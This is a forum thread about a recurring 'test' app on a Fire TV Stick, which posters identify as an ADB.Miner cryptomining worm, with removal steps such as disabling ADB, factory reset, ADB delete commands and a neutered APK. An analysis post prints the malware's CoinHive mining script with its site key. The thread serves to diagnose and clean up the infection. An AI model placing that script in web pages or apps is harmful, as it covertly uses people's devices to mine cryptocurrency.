[Malware/Virus] Solution Inside - Firestick Gen 2 - "test" app keeps popping up
hi guys ! i have a question i hope someone can help me with. I have a Gen 2 Firestick and for 2 days now this app called "test" keeps popping up at all times, i have no clue why its doing this. I have uninstalled the app and it comes back and ive even tryed to run the app and its tells me the App needs updated to run on my device, look for an updated version on my store.. and yeah the app dont exist on the store.. What is up with this thing? I even reformated the firestick and within a few hours it was back and doing it again !!!! this thing is driving me nuts !!! youll be watching a video or movie and this thing pops up and forces your video to pause and even crash. Can anyone help me?? i only have Terrarium,Turbo vpn,es file explorer, mouse toggle, and SPMC installed. the rest is all from Amazons factory reset. I just want to block it from running or destroy it completely. you dont even have to be doing anything and it pops up even on the Homescreen. ANyhelp would be great thank you all !! btw.. ran a virus scan it said it deleted it and it came back, tryed a firewall blocked it ,,still keeps popping up !! AURG!! help !!
First reported by @azureru as malware in this post.
------------------------------------------------------------------------------------------
@innovaciones provides a number of solutions - including a verified working modded .apk of the malware which renders it harmless.
hi guys ! i have a question i hope someone can help me with. I have a Gen 2 Firestick and for 2 days now this app called "test" keeps popping up at all times, i have no clue why its doing this. I have uninstalled the app and it comes back and ive even tryed to run the app and its tells me the App needs updated to run on my device, look for an updated version on my store.. and yeah the app dont exist on the store.. What is up with this thing? I even reformated the firestick and within a few hours it was back and doing it again !!!! this thing is driving me nuts !!! youll be watching a video or movie and this thing pops up and forces your video to pause and even crash. Can anyone help me?? i only have Terrarium,Turbo vpn,es file explorer, mouse toggle, and SPMC installed. the rest is all from Amazons factory reset. I just want to block it from running or destroy it completely. you dont even have to be doing anything and it pops up even on the Homescreen. ANyhelp would be great thank you all !! btw.. ran a virus scan it said it deleted it and it came back, tryed a firewall blocked it ,,still keeps popping up !! AURG!! help !!
------------------------------------------------------------------Moderator Edit-------------------------------------------------------------------
Verified Solution
Verified Solution
First reported by @azureru as malware in this post.
I have the same app on my Android Stick and it kept coming back.
Reverse engineering it - that Test app is a variation of ADB.Miner worm that will use your device to open webview. It open single html that will mine monero using CoinHive
Code:<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous('eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf',{ threads:3, throttle: 0.6 }); miner.start(); </script>
If you have uninstall the app on your Android and it kept coming back - make sure to disable adb on your Android and check for other Android devices on your network for this worm.
------------------------------------------------------------------------------------------
@innovaciones provides a number of solutions - including a verified working modded .apk of the malware which renders it harmless.
I can confirm that this "Test" app is actually a virus, I reverse engineering it too and when the Test apk auto starts it opens an script from a "run.html" file that have the same code that azureru posted, so this is definitely an ADB.Miner, how we got the virus? well I guess from sideloading sketchy apps, the main problem with this virus is that the Fire TV gets very slow because most of the performance is used for mining.
How we can get rid of this virus?
Well first, is there other Fire TVs or Android devices in your place? if the answer is yes then these devices could be infected too, this virus spreads using the ADB protocol so all the devices that have "ADB debugging" option enabled that are connected in your wifi network will get the virus, so is very important that you turn off "ADB debugging" in all your Android devices.
RESET TO FACTORY SETTINGS
There a several ways to get rid of this virus, the most effective way will be reseting to factory settings all your devices, and be careful next time what apk you install, and don't forget to turn off ADB debugging when not in use.
DELETE VIRUS FILES
Using ADB input these commands:
shell rm data/local/tmp/ufo.apk
shell rm data/local/tmp/lock.txt
shell rm data/local/tmp/smi
shell rm data/local/tmp/endat
shell rm data/local/tmp/nohup
uninstall com.google.time.timer
reboot
This are some of the virus files I found but I really don't know if deleting these files will be enough to disable the virus.
INSTALL MODDED VIRUS
If you don't want to reset to factory settings and all you want is to "turn off" the miner then you can install the attached APK that is a modded version from the original virus except the run.html is a blank page (without the minning script) and the Activities name from the AndroidManifest.xml were changed so it can't start now, so pretty much the virus will think it's working but it's not.
HIDE THE VIRUS
As recommended here you could try the hide command:
pm hide com.google.time.timer
Here is more information about these kind of virus, the test virus a variation from this:
http://blog.netlab.360.com/adb-miner-more-information-en/
I hope this information could help someone.
Last edited by a moderator: